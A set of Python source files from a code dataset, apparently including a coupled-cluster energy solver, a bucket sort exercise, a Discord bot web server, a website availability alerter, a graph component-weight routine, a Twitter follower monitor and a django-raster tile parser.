C[:,a], C[:,b], \n C[:,c], C[:,d], g, optimize='optimal')\n o = slice(0, nelec)\n v = slice(nelec, len(g))\n Voovv = ERI(o,o,v,v)\n Voooo = ERI(o,o,o,o)\n Vvvvv = ERI(v,v,v,v)\n Vvoov = ERI(v,o,o,v)\n\n g = None\n\n tsave.append(time.time() - t)\n show_progress(tsave, printif)\n t = time.time()\n\n # Get eigenvalues Matrix D\n new = np.newaxis\n eo = eps[:nelec]\n ev = eps[nelec:]\n D = 1.0/(eo[:, new, new, new] + eo[new, :, new, new] - ev[new, new, :, new] - ev[new, new, new, :])\n\n tsave.append(time.time() - t)\n show_progress(tsave, printif)\n t = time.time()\n\n # Initial guess for amplitudes\n\n T = Voovv*D\n\n # Get MP2 energy\n\n E = CCD_Energy(T, Voovv)\n\n printif('\\nMP2 Energy: {:<15.10f}\\n'.format(E + Escf))\n\n # Setup iteration options\n rms = 0.0\n dE = 1\n ite = 1\n rms_LIM = 10**(-8)\n E_LIM = 10**(-12)\n t0 = time.time()\n printif('\\U00003030'*20)\n\n # Start CC iterations\n while abs(dE) > E_LIM or rms > rms_LIM:\n t = time.time()\n if ite > Settings[\"cc_max_iter\"]:\n raise NameError('CCD equations did not converge')\n T, rms = CCD_Amplitude(T, D, Voovv, Voooo, Vvvvv, Vvoov)\n dE = -E\n E = CCD_Energy(T, Voovv)\n dE += E\n printif(\"Iteration {}\".format(numoji(ite)))\n printif(\"\\U000027B0 Correlation energy: {:< 15.10f}\".format(E))\n printif(\"\\U0001F53A Energy change: {:< 15.10f}\".format(dE))\n printif(\"\\U00002622 Max RMS residue: {:< 15.10f}\".format(rms))\n printif(\"\\U0001F570 Time required: {:< 15.10f}\".format(time.time() - t))\n printif('\\U00003030'*20)\n ite += 1\n\n printif('\\U0001F3C1 CCD Energy: {:<15.10f}'.format(E + Escf))\n printif('\\U000023F3 CCD iterations took %.2f seconds.\\n' % (time.time() - t0))\n\n return (E + Escf)\n\n\nif __name__ == '__main__':\n\n from input import Settings\n compute_CCD(Settings)\n","sub_path":"Combined/CCD.py","file_name":"CCD.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"125328251","text":"import random\r\n#random.seed(0)\r\n\r\n\r\ndef bucket_sort(mylist):\r\n # initialize the buckets\r\n mydict = {}\r\n # place the values to be sorted in the buckets\r\n for i in mylist:\r\n try:\r\n mydict[i//10].append(i)\r\n except KeyError:\r\n mydict[i//10] = [i]\r\n # sort each bucket\r\n result = []\r\n for i in mydict.values():\r\n i.sort()\r\n # concatenate your bucket to the result\r\n keys = list(mydict.keys())\r\n keys.sort()\r\n for key in keys:\r\n result.extend(mydict[key])\r\n return result\r\n\r\n\r\ndef main():\r\n \"\"\" this is not exactly relevant, but the following 4 lines of\r\n code can be replaced by one line:\r\n list_a = [random.randint(0, 1000) for i in range(100)]\r\n \"\"\"\r\n listA=[]\r\n for i in range(10):\r\n a = random.randint(0,1000)\r\n listA.append(a)\r\n print(listA)\r\n listA = bucket_sort(listA)\r\n print(\"SORTED:\", listA) \r\n\r\nmain()\r\n","sub_path":"bucket_sort_student.py","file_name":"bucket_sort_student.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"495036197","text":"from svggen.api.component import Component\nfrom svggen.utils.mymath import sin, pi, deg2rad, tan, cos, N\nfrom svggen.api.composables.graph.Face import Face\nfrom svggen.api.composables.GraphComposable import Graph\nfrom svggen.api.ports.FacePort import FacePort\nfrom svggen.api.ports.EdgePort import EdgePort\nimport IPython\n\nclass Beam(Component):\n def define(self):\n self.addParameter(\"length\")\n #ANDY TODO: figure out what these keys were for and implement them more elegantly\n #self.addParameter(\"diameter\")\n self.addParameter(\"beamwidth\")\n\n self.addParameter(\"shape\", 3)\n self.addParameter(\"phase\", 0)\n\n self.addParameter(\"angle\")\n self.addParameter(\"tangle\", 90)\n self.addParameter(\"bangle\", 90)\n\n self.addInterface(\"topface\")\n self.addInterface(\"botface\")\n self.addInterface(\"topedge\")\n self.addInterface(\"botedge\")\n\n def assemble(self):\n ### Assemble the object\n try:\n tangle = self.getParameter(\"angle\")\n bangle = self.getParameter(\"angle\")\n except KeyError:\n tangle = self.getParameter(\"tangle\")\n bangle = self.getParameter(\"bangle\")\n\n try:\n d = self.getParameter(\"diameter\")\n t = self.getParameter(\"diameter\") * sin(N(pi) / self.getParameter(\"shape\"))\n except KeyError:\n d = self.getParameter(\"beamwidth\") / sin(N(pi) / self.getParameter(\"shape\"))\n t = self.getParameter(\"beamwidth\")\n\n length = self.getParameter(\"length\")\n shape = self.getParameter(\"shape\")\n phase = self.getParameter(\"phase\")\n\n radius = d/2.\n dtheta = deg2rad(360. / shape)\n thetas = [ dtheta / 2. + dtheta * i for i in range(shape) ]\n\n thickness = 2 * radius * sin(dtheta / 2.)\n\n dl = [ radius * (1 - cos(t)) / tan(deg2rad(bangle)) for t in thetas ]\n dl = [ l - dl[-phase % shape] for l in dl ]\n dr = [ radius * (1 - cos(t)) / tan(deg2rad(tangle)) for t in thetas ]\n dr = [ r - dr[-phase % shape] for r in dr ]\n\n graph = Graph()\n angle = 360.0 / shape\n faces = []\n for i in range(len(thetas)):\n faces.append(Face('', ((thickness, dr[i]), (thickness, length - dl[i]), (0, length - dl[i-1]), (0, dr[i-1]))))\n for i in range(phase):\n faces.append(faces.pop(0))\n\n fromEdge = None\n for i in range(len(faces)):\n graph.attachFace(fromEdge, faces[i], 'e3', prefix=\"r%d\"%i, angle = angle)\n fromEdge = \"r%d.e1\" % i\n\n #addTabs(self.graph, \"t1\", fromEdge, (\"r0\", \"r0.e3\"), width=min(thickness, 10), angle=angle)\n \"\"\" ANDYTODO: put back tabs\n if phase < 0:\n graph.addTab(fromEdge, faces[0].name + \".e3\", angle = angle, width=thickness)\n else:\n graph.addTab(faces[0].name + \".e3\", fromEdge, angle = angle, width=thickness)\n \"\"\"\n self.composables[\"graph\"] = graph\n\n # Assign interfaces\n self.setInterface(\"topface\", FacePort(self, [\"r%d.e0\" % n for n in range(shape)], \"\"))\n self.setInterface(\"botface\", FacePort(self, [\"r%d.e2\" % n for n in range(shape)], \"\"))\n self.setInterface(\"topedge\", EdgePort(self, \"r%d.e0\" % (-phase % shape), \"beamwidth\"))\n self.setInterface(\"botedge\", EdgePort(self, \"r%d.e2\" % (-phase % shape), \"beamwidth\"))\n \n \n\nif __name__ == \"__main__\":\n b = Beam()\n # b.toYaml(\"output/Beam/beam.yaml\")\n\n b.setParameter(\"length\", 100)\n b.setParameter(\"beamwidth\", 10)\n b.setParameter(\"shape\", 3)\n b.setParameter(\"tangle\", 90)\n b.setParameter(\"bangle\", 90)\n b.setParameter(\"phase\", 2)\n \n b.sympyicize(\"length\")\n b.sympyicize(\"beamwidth\")\n #b.symbolicize(\"length\")\n\n b.makeOutput(\"output/BeamConstrained\", protobuf=True, display=False)\n","sub_path":"svggen/library/legacy/BeamConstrained.py","file_name":"BeamConstrained.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"173386898","text":"suma = 0\nliczby = 0\ni = 1\nwhile i != 0:\n i = int(input('Podaj liczbe: '))\n #liczby += 1\n if i != 0:\n suma += i\n liczby += 1\nsrednia = suma/liczby\nprint(f'RESULT: Liczb: {liczby}, Suma = {suma}, Srednia = {srednia}')","sub_path":"02-ControlStructures/41.py","file_name":"41.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"22572424","text":"import asyncio\nimport yaml\nfrom discord.ext import commands\nfrom aiohttp import web\n\n\nclass WebServer(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.app = web.Application()\n self.app.router.add_get(\"/\", self.index)\n self.app.router.add_get(\"/guilds\", self.guild_count)\n self.app.router.add_get(\"/ping\", self.ping_handler)\n self.app.router.add_get(\"/userinfo\", self.userinfo)\n self.app.router.add_get(\"/guildinfo\", self.serverinfo)\n self.bot.loop.create_task(self.run())\n\n async def run(self):\n with open(\"polls.yaml\") as f:\n config = yaml.safe_load(f)\n\n self.allowed_domains = config.get(\"allowed_domains\", \"*\")\n asyncio.ensure_future(web._run_app(self.app, host=config[\"host\"], port=config[\"port\"]))\n\n async def index(self, request):\n return web.Response(text=\"Hi I'm Miso Bot!\")\n\n async def ping_handler(self, request):\n return web.Response(text=f\"{self.bot.latency*1000}\")\n\n async def guild_count(self, request):\n return web.Response(text=f\"{len(self.bot.guilds)}\")\n\n async def serverinfo(self, request):\n try:\n guildid = request.rel_url.query[\"guildid\"]\n guild = self.bot.get_guild(int(guildid))\n return web.json_response({\n \"name\": guild.name,\n \"id\": guild.id,\n \"icon\": str(guild.icon_url),\n \"owner_id\": guild.owner_id\n }, headers={\n \"Access-Control-Allow-Origin\": self.allowed_domains\n })\n except Exception as e:\n return web.Response(text=f\"Error: {e}\")\n\n async def userinfo(self, request):\n try:\n userid = request.rel_url.query[\"userid\"]\n user = self.bot.get_user(int(userid))\n return web.json_response({\n \"name\": user.name,\n \"id\": user.id,\n \"discriminator\": user.discriminator,\n \"avatar\": str(user.avatar_url),\n \"bot\": user.bot\n }, headers={\n \"Access-Control-Allow-Origin\": self.allowed_domains\n })\n except Exception as e:\n return web.Response(text=f\"Error: {e}\")\n\n def cog_unload(self):\n self.bot.loop.create_task(self.shutdown())\n\n async def shutdown(self):\n await self.app.shutdown()\n await self.app.cleanup()\n\n\ndef setup(bot):\n bot.add_cog(WebServer(bot))\n","sub_path":"cogs/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"464547940","text":"from collections import deque\nfrom time import time\n\nfrom frontend.Console import Console\nfrom metrics.Metric import Metric\nfrom utilities import string_parser\nfrom utilities.config_parser import console_config\n\n\nclass Alerter:\n __watch_time = console_config[\"alerts\"][\"duration\"]\n __availability_threshold = console_config[\"alerts\"][\"availability_threshold\"]\n\n def __init__(self):\n self.__website_name = None\n self.__recent_metrics: deque[Metric] = deque()\n self.__is_triggered = False\n\n @property\n def website_name(self) -> str:\n return self.__website_name\n\n @website_name.setter\n def website_name(self, website_name: str):\n self.__website_name = website_name\n\n def __get_availability(self) -> float:\n \"\"\"\n Return mean availability of metric list\n \"\"\"\n availability = 0\n for metric in self.__recent_metrics:\n if metric.available:\n availability += 1\n availability *= 100\n availability /= len(self.__recent_metrics)\n\n return availability\n\n def update(self, metric: Metric):\n \"\"\"\n Add the new metric to the list and remove the oldest ones\n \"\"\"\n now = time()\n self.__recent_metrics.append(metric)\n\n if self.__recent_metrics[-1].timestamp - self.__recent_metrics[0].timestamp >= Alerter.__watch_time:\n # handling alerts only if we have enough data\n while self.__recent_metrics[0].timestamp < now - Alerter.__watch_time:\n self.__recent_metrics.popleft()\n\n availability = self.__get_availability()\n\n if self.__is_triggered and availability >= Alerter.__availability_threshold:\n self.__is_triggered = False\n Console.add_alert(\n \"Website %s is back up. availability=%s%s, time=%s\\n\" % (\n self.website_name, string_parser.keep_n_digits(availability, 4), \"%\",\n string_parser.parse_timestamp(self.__recent_metrics[-1].timestamp)))\n\n elif not self.__is_triggered and availability < Alerter.__availability_threshold:\n self.__is_triggered = True\n Console.add_alert(\n \"Website %s is down. availability=%s%s, time=%s\\n\" % (\n self.website_name, string_parser.keep_n_digits(availability, 4), \"%\",\n string_parser.parse_timestamp(self.__recent_metrics[-1].timestamp)))\n","sub_path":"frontend/Alerter.py","file_name":"Alerter.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"535870251","text":"class Graph:\r\n def __init__(self):\r\n self.vertexes = 0\r\n self.offset = []\r\n self.edges = []\r\n self.weights = []\r\n\r\n def count_vertexes(self, count):\r\n self.vertexes = count\r\n self.offset = [0 for _ in range(self.vertexes + 1)]\r\n\r\n def create_edge(self, vertex_1, vertex_2, weight):\r\n self.edges.insert(self.offset[vertex_1], vertex_2)\r\n self.weights.insert(self.offset[vertex_1], weight)\r\n self.change_offset(vertex_1)\r\n self.edges.insert(self.offset[vertex_2], vertex_1)\r\n self.weights.insert(self.offset[vertex_2], weight)\r\n self.change_offset(vertex_2)\r\n\r\n def change_offset(self, vertex):\r\n for i in range(vertex + 1, self.vertexes + 1):\r\n self.offset[i] += 1\r\n\r\n def dfs(self, vertex=0, used=None):\r\n if used is None:\r\n used = set()\r\n if vertex in used:\r\n return used\r\n for v in self.edges[self.offset[vertex]:self.offset[vertex + 1]]:\r\n used.add(vertex)\r\n used = used.union(self.dfs(v, used))\r\n return used\r\n\r\n def is_connected(self):\r\n return True if len(self.dfs()) == len(self.offset) - 1 else False\r\n\r\n def components_weights(self):\r\n return [self.component_weight(c) for c in self.connected_components()]\r\n\r\n def component_weight(self, component):\r\n weight = 0\r\n for vertex1 in component:\r\n for vertex2 in component:\r\n if self.edge_between(vertex1, vertex2):\r\n weight_index = self.edges[self.offset[vertex1]:self.offset[vertex1 + 1]].index(vertex2)\r\n weight += self.weights[self.offset[vertex1]:self.offset[vertex1 + 1]][weight_index]\r\n return weight // 2\r\n\r\n def edge_between(self, vertex1, vertex2):\r\n if vertex2 not in self.edges[self.offset[vertex1]:self.offset[vertex1 + 1]]:\r\n return False\r\n return True\r\n\r\n def connected_components(self):\r\n components = []\r\n used = set()\r\n for i in range(self.vertexes):\r\n if i not in used:\r\n component = self.dfs(i)\r\n used = used.union(component)\r\n components.append(list(component))\r\n return components\r\n\r\n\r\nif __name__ == '__main__':\r\n n, m = map(int, input().split())\r\n gr = Graph()\r\n gr.count_vertexes(n)\r\n for _ in range(m):\r\n v1, v2, w = map(int, input().split())\r\n gr.create_edge(v1, v2, w)\r\n w = sorted(gr.components_weights())\r\n for j in range(len(w)):\r\n print(w[j])\r\n","sub_path":"contest_6/B - весы компонент связности.py","file_name":"B - весы компонент связности.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"155642776","text":"import logging\nimport platform\nfrom typing import Optional, Any, Union\n\nimport discord\nimport schedule\nimport tweepy\n\nfrom helpers.constants import (\n DEBUGGING_CODE,\n CHAN_BOT_SPAM_PRIVATE,\n CHAN_TWITTERVERSE,\n CHAN_GENERAL,\n ROLE_EVERYONE_PROD,\n)\nfrom helpers.embed import buildTweetEmbed\nfrom helpers.misc import general_locked\nfrom objects.Exceptions import TwitterFollowerException\nfrom objects.Logger import discordLogger\n\nasyncio_logger = discordLogger(\n name=\"asyncio\", level=logging.DEBUG if DEBUGGING_CODE else logging.INFO\n)\n\nlogger = discordLogger(\n name=__name__,\n level=logging.DEBUG if \"Windows\" in platform.platform() else logging.INFO,\n)\n\n\nclass TwitterListMember:\n def __init__(self, client: tweepy.Client, member_data):\n self.client: tweepy.Client = client\n self.user_id: Optional[Union[int, str]] = member_data[\"id\"]\n self.name: Optional[str] = member_data[\"name\"]\n self.usernamename: Optional[str] = member_data[\"username\"]\n self.orig_followers: Optional[Union[dict, Any]] = None\n self.new_followers: Optional[Union[dict, Any]] = None\n\n self._collect_users(initial=True)\n\n def _collect_users(self, initial: bool) -> None:\n if initial:\n self.orig_followers = self.client.get_users_following(id=self.user_id)\n else:\n self.new_followers = self.client.get_users_following(id=self.user_id)\n\n @property\n def differences(self): # TODO Type hinting\n # TODO Not sure if this all works.\n self._collect_users(initial=False)\n\n if not self.new_followers:\n return\n\n return set(self.orig_followers) ^ set(self.new_followers)\n\n\nasync def send_tweet(client: discord.Client, member: TwitterListMember) -> None:\n # class TwitterButtons(discord.ui.View):\n # def __init__(\n # self,\n # timeout=1200,\n # ) -> None:\n # super(TwitterButtons, self).__init__()\n # self.message: Optional[discord.Message] = None\n # self.timeout = timeout\n # self.client = client\n #\n # async def on_timeout(self) -> None:\n # tweepy_client_logger.debug(\n # \"Twitter buttons have timed out. Removing all buttons\"\n # )\n #\n # self.clear_items()\n # await self.message.edit(view=self)\n #\n # # noinspection PyMethodMayBeStatic\n # def grabTwitterLink(self, message_embed: discord.Embed) -> str:\n # link: list[str] = [\n # field.value\n # for field in message_embed.fields\n # if field.name == \"Link to Tweet\"\n # ]\n # return \"\".join(link)\n #\n # @discord.ui.button(\n # label=\"Send to General\",\n # custom_id=\"send_to_general\",\n # style=discord.ButtonStyle.gray,\n # )\n # async def send_to_general(\n # self, interaction: discord.Interaction, button: discord.ui.Button\n # ):\n # tweepy_client_logger.debug(\"Sending tweet to general channel\")\n #\n # general_channel: discord.TextChannel = await self.client.fetch_channel(\n # CHAN_GENERAL\n # )\n #\n # if general_locked(\n # general_channel, self.client.guilds[0].get_role(ROLE_EVERYONE_PROD)\n # ):\n # tweepy_client_logger.debug(\n # \"Game day mode is on. Will send tweets to live discussion.\"\n # )\n # general_channel = await self.client.fetch_channel(CHAN_DISCUSSION_LIVE)\n #\n # await general_channel.send(\n # f\"{interaction.user.name}#{interaction.user.discriminator} forwarded the following tweet: {self.grabTwitterLink(interaction.message.embeds[0])}\"\n # )\n # await interaction.response.send_message(\"Tweet forwarded!\", ephemeral=True)\n #\n # @discord.ui.button(\n # label=\"Send to Recruiting\",\n # custom_id=\"send_to_recruiting\",\n # style=discord.ButtonStyle.gray,\n # )\n # async def send_to_recruiting(\n # self, interaction: discord.Interaction, button: discord.ui.Button\n # ):\n # tweepy_client_logger.debug(\"Sending tweet to recruiting channel\")\n #\n # recruiting_channel = await self.client.fetch_channel(CHAN_RECRUITING)\n #\n # if general_locked(\n # recruiting_channel, self.client.guilds[0].get_role(ROLE_EVERYONE_PROD)\n # ):\n # tweepy_client_logger.debug(\n # \"Game day mode is on. Will send tweets to streaming discussion.\"\n # )\n # recruiting_channel = await self.client.fetch_channel(\n # CHAN_DISCUSSION_STREAMING\n # )\n #\n # await recruiting_channel.send(\n # f\"{interaction.user.name}#{interaction.user.discriminator} forwarded the following tweet: {self.grabTwitterLink(interaction.message.embeds[0])}\"\n # )\n # await interaction.response.send_message(\"Tweet forwarded!\", ephemeral=True)\n\n logger.debug(f\"Sending a tweet...\")\n\n if DEBUGGING_CODE:\n twitter_channel: discord.TextChannel = await client.fetch_channel(\n CHAN_BOT_SPAM_PRIVATE\n )\n else:\n twitter_channel = await client.fetch_channel(CHAN_TWITTERVERSE)\n\n embed = buildTweetEmbed(response=response)\n\n # author: User = response.includes[\"users\"][0]\n\n # view: TwitterButtons = TwitterButtons()\n\n test_channel: discord.TextChannel = await client.fetch_channel(CHAN_GENERAL)\n\n if general_locked(test_channel, client.guilds[0].get_role(ROLE_EVERYONE_PROD)):\n view.children[0].label = \"Send to Live\" # noqa\n view.children[1].label = \"Send to Streaming\" # noqa\n\n # view.add_item(\n # item=discord.ui.Button(\n # style=discord.ButtonStyle.url,\n # label=\"Open Tweet...\",\n # url=f\"https://twitter.com/{author.username}/status/{response.data.id}\",\n # )\n # )\n # view.message = await twitter_channel.send(embed=embed, view=view)\n # logger.debug(\"Waiting for twitter buttons to be pushed\")\n\n # asyncio.run_coroutine_threadsafe(coro=view.wait(), loop=client.loop)\n\n logger.info(f\"Tweet sent!\")\n\n\nclass TwitterFollowerMonitor:\n def __init__(self, client: tweepy.Client, members: Union[dict, Any]):\n self.client: tweepy.Client = client\n self.list_members: Optional[list[TwitterListMember]] = self._setup_list_members(\n members=members\n )\n asyncio_logger.debug(\"Creating Twitter Follower Monitor\")\n\n self._setup_schedule()\n\n def _setup_list_members(self, members: Union[dict, Any]) -> list[TwitterListMember]:\n return [\n TwitterListMember(client=self.client, member_data=member)\n for member in members\n ]\n\n def check_differences(self):\n asyncio_logger.debug(\"Attempting to check for Twitter Follower differences\")\n\n assert self.list_members, TwitterFollowerException(\"Error\")\n\n for member in self.list_members:\n continue\n\n @property\n def all_jobs(self) -> str:\n all_jobs: list[schedule.Job] = schedule.jobs\n all_jobs_str: str = \"\"\n for job in all_jobs:\n all_jobs_str += f\"* {repr(job)}\\n\"\n\n return all_jobs_str\n\n def _setup_schedule(self) -> None:\n asyncio_logger.debug(\"Setting up Twitter Monitor Follower schedule\")\n\n schedule.every().hour.do(self.check_differences)\n\n asyncio_logger.debug(\n f\"Scheduled messages complete. Jobs are:\\n\\n{self.all_jobs}\"\n )\n","sub_path":"objects/TweepyFollowerMonitor.py","file_name":"TweepyFollowerMonitor.py","file_ext":"py","file_size_in_byte":7731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"306119021","text":"import os\nimport deepdanbooru as dd\nimport tensorflow as tf\n\nDEFAULT_PROJECT_CONTEXT = {\n 'image_width': 299,\n 'image_height': 299,\n 'database_path': None,\n 'minimum_tag_count': 20,\n 'model': 'resnet_custom_v2',\n 'minibatch_size': 32,\n 'epoch_count': 10,\n 'export_model_per_epoch': 10,\n 'checkpoint_frequency_mb': 200,\n 'console_logging_frequency_mb': 10,\n 'optimizer': 'adam',\n 'learning_rate': 0.001,\n 'rotation_range': [0.0, 360.0],\n 'scale_range': [0.9, 1.1],\n 'shift_range': [-0.1, 0.1]\n}\n\n\ndef load_project(project_path):\n project_context_path = os.path.join(project_path, 'project.json')\n project_context = dd.io.deserialize_from_json(project_context_path)\n tags = dd.data.load_tags(project_path)\n\n model_type = project_context['model']\n model_path = os.path.join(project_path, f'model-{model_type}.h5')\n model = tf.keras.models.load_model(model_path)\n\n return project_context, model, tags\n","sub_path":"deepdanbooru/project/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"570931184","text":"import datetime\nimport glob\nimport os\nimport shutil\nimport tempfile\nimport traceback\nimport zipfile\n\nimport numpy\n\nfrom django.conf import settings\nfrom django.contrib.gis.gdal import GDALRaster\nfrom django.db import connection\nfrom django.dispatch import Signal\nfrom raster import tiler\nfrom raster.const import WEB_MERCATOR_SRID, WEB_MERCATOR_TILESIZE\nfrom raster.models import RasterLayerBandMetadata, RasterTile\n\nrasterlayers_parser_ended = Signal(providing_args=['instance'])\n\n\nclass RasterLayerParser(object):\n \"\"\"\n Class to parse raster layers.\n \"\"\"\n def __init__(self, rasterlayer):\n self.rasterlayer = rasterlayer\n self.rastername = os.path.basename(rasterlayer.rasterfile.name)\n\n # Set raster tilesize\n self.tilesize = int(getattr(settings, 'RASTER_TILESIZE', WEB_MERCATOR_TILESIZE))\n self.zoomdown = getattr(settings, 'RASTER_ZOOM_NEXT_HIGHER', True)\n\n def log(self, msg, reset=False, status=None, zoom=None):\n \"\"\"\n Write a message to the parse log of the rasterlayer instance and update\n the parse status object.\n \"\"\"\n if status is not None:\n self.rasterlayer.parsestatus.status = status\n\n if zoom is not None:\n self.rasterlayer.parsestatus.tile_level = zoom\n\n # Prepare datetime stamp for log\n now = '[{0}] '.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n # Write log, reset if requested\n if reset:\n self.rasterlayer.parsestatus.log = now + msg\n else:\n self.rasterlayer.parsestatus.log += '\\n' + now + msg\n\n self.rasterlayer.save()\n self.rasterlayer.parsestatus.save()\n\n def get_raster_file(self):\n \"\"\"\n Make local copy of rasterfile, which is needed if files are stored on\n remote storage, and unzip it if necessary.\n \"\"\"\n self.log('Getting raster file from storage')\n\n raster_workdir = getattr(settings, 'RASTER_WORKDIR', None)\n self.tmpdir = tempfile.mkdtemp(dir=raster_workdir)\n\n # Access rasterfile and store in a temp folder\n rasterfile = open(os.path.join(self.tmpdir, self.rastername), 'wb')\n for chunk in self.rasterlayer.rasterfile.chunks():\n rasterfile.write(chunk)\n rasterfile.close()\n\n # If the raster file is compressed, decompress it\n fileName, fileExtension = os.path.splitext(self.rastername)\n\n if fileExtension == '.zip':\n\n # Open and extract zipfile\n zf = zipfile.ZipFile(os.path.join(self.tmpdir, self.rastername))\n zf.extractall(self.tmpdir)\n\n # Remove zipfile\n os.remove(os.path.join(self.tmpdir, self.rastername))\n\n # Get filelist from directory\n raster_list = glob.glob(os.path.join(self.tmpdir, \"*.*\"))\n\n # Check if only one file is found in zipfile\n if len(raster_list) > 1:\n self.log(\n 'WARNING: Found more than one file in zipfile '\n 'using only first file found. This might lead '\n 'to problems if its not a raster file.'\n )\n\n # Return first one as raster file\n self.rastername = os.path.basename(raster_list[0])\n\n def open_raster_file(self):\n \"\"\"\n Open the raster file as GDALRaster and set nodata-values.\n \"\"\"\n self.log('Opening raster file as GDALRaster.')\n\n # Open raster file\n self.dataset = GDALRaster(os.path.join(self.tmpdir, self.rastername), write=True)\n\n # Make sure nodata value is set from input\n self.hist_values = []\n self.hist_bins = []\n for i, band in enumerate(self.dataset.bands):\n if self.rasterlayer.nodata is not None:\n band.nodata_value = float(self.rasterlayer.nodata)\n\n # Create band metatdata object\n bandmeta = RasterLayerBandMetadata.objects.create(\n rasterlayer=self.rasterlayer,\n band=i,\n nodata_value=band.nodata_value,\n min=band.min,\n max=band.max\n )\n\n # Prepare numpy hist values and bins\n self.hist_values.append(numpy.array(bandmeta.hist_values))\n self.hist_bins.append(numpy.array(bandmeta.hist_bins))\n\n # Store original metadata for this raster\n meta = self.rasterlayer.metadata\n\n meta.uperleftx = self.dataset.origin.x\n meta.uperlefty = self.dataset.origin.y\n meta.width = self.dataset.width\n meta.height = self.dataset.height\n meta.scalex = self.dataset.scale.x\n meta.scaley = self.dataset.scale.y\n meta.skewx = self.dataset.skew.x\n meta.skewy = self.dataset.skew.y\n meta.numbands = len(self.dataset.bands)\n meta.srs_wkt = self.dataset.srs.wkt\n meta.srid = self.dataset.srs.srid\n\n meta.save()\n\n def close_raster_file(self):\n \"\"\"\n On Windows close and release the GDALRaster resources\n \"\"\"\n try:\n if self.dataset:\n del self.dataset\n self.dataset = None\n except AttributeError:\n pass\n\n def create_tiles(self, zoom):\n \"\"\"\n Create tiles for this raster at the given zoomlevel.\n\n This routine first snaps the raster to the grid of the zoomlevel,\n then creates the tiles from the snapped raster.\n \"\"\"\n # Compute the tile x-y-z index range for the rasterlayer for this zoomlevel\n bbox = self.rasterlayer.extent()\n indexrange = tiler.tile_index_range(bbox, zoom)\n\n # Compute scale of tiles for this zoomlevel\n tilescale = tiler.tile_scale(zoom)\n\n # Count the number of tiles that are required to cover the raster at this zoomlevel\n nr_of_tiles = (indexrange[2] - indexrange[0] + 1) * (indexrange[3] - indexrange[1] + 1)\n\n # Create destination raster file\n self.log('Snapping dataset to zoom level {0}'.format(zoom))\n\n bounds = tiler.tile_bounds(indexrange[0], indexrange[1], zoom)\n sizex = (indexrange[2] - indexrange[0] + 1) * self.tilesize\n sizey = (indexrange[3] - indexrange[1] + 1) * self.tilesize\n dest_file = os.path.join(self.tmpdir, 'djangowarpedraster' + str(zoom) + '.tif')\n\n snapped_dataset = self.dataset.warp({\n 'name': dest_file,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'width': sizex,\n 'height': sizey,\n })\n\n self.log('Creating {0} tiles for zoom {1}.'.format(nr_of_tiles, zoom))\n\n counter = 0\n for tilex in range(indexrange[0], indexrange[2] + 1):\n for tiley in range(indexrange[1], indexrange[3] + 1):\n # Log progress\n counter += 1\n if counter % 250 == 0:\n self.log('{0} tiles created at zoom {1}'.format(counter, zoom))\n\n # Calculate raster tile origin\n bounds = tiler.tile_bounds(tilex, tiley, zoom)\n\n # Construct band data arrays\n pixeloffset = (\n (tilex - indexrange[0]) * self.tilesize,\n (tiley - indexrange[1]) * self.tilesize\n )\n\n band_data = [\n {\n 'data': band.data(offset=pixeloffset, size=(self.tilesize, self.tilesize)),\n 'nodata_value': band.nodata_value\n } for band in snapped_dataset.bands\n ]\n\n # Add tile data to histogram\n if zoom == self.max_zoom:\n self.push_histogram(band_data)\n\n # Warp source raster into this tile (in memory)\n dest = GDALRaster({\n 'width': self.tilesize,\n 'height': self.tilesize,\n 'origin': [bounds[0], bounds[3]],\n 'scale': [tilescale, -tilescale],\n 'srid': WEB_MERCATOR_SRID,\n 'datatype': snapped_dataset.bands[0].datatype(),\n 'bands': band_data,\n })\n\n # Store tile\n RasterTile.objects.create(\n rast=dest,\n rasterlayer=self.rasterlayer,\n tilex=tilex,\n tiley=tiley,\n tilez=zoom\n )\n\n # Store histogram data\n if zoom == self.max_zoom:\n bandmetas = RasterLayerBandMetadata.objects.filter(rasterlayer=self.rasterlayer)\n for bandmeta in bandmetas:\n bandmeta.hist_values = self.hist_values[bandmeta.band].tolist()\n bandmeta.save()\n\n # Remove snapped dataset\n self.log('Removing snapped dataset.', zoom=zoom)\n snapped_dataset = None\n os.remove(dest_file)\n\n def push_histogram(self, data):\n \"\"\"\n Add data to band level histogram histogram.\n \"\"\"\n # Loop through bands of this tile\n for i, dat in enumerate(data):\n # Create histogram for new data with the same bins\n new_hist = numpy.histogram(dat['data'], bins=self.hist_bins[i])\n # Add counts of this tile to band metadata histogram\n self.hist_values[i] += new_hist[0]\n\n def drop_empty_rasters(self):\n \"\"\"\n Remove rasters that are only no-data from the current rasterlayer.\n \"\"\"\n self.log(\n 'Dropping empty raster tiles.',\n status=self.rasterlayer.parsestatus.DROPPING_EMPTY_TILES\n )\n\n # Setup SQL command\n sql = (\n \"DELETE FROM raster_rastertile \"\n \"WHERE ST_Count(rast)=0 \"\n \"AND rasterlayer_id={0}\"\n ).format(self.rasterlayer.id)\n\n # Run SQL to drop empty tiles\n cursor = connection.cursor()\n cursor.execute(sql)\n\n def parse_raster_layer(self):\n \"\"\"\n This function pushes the raster data from 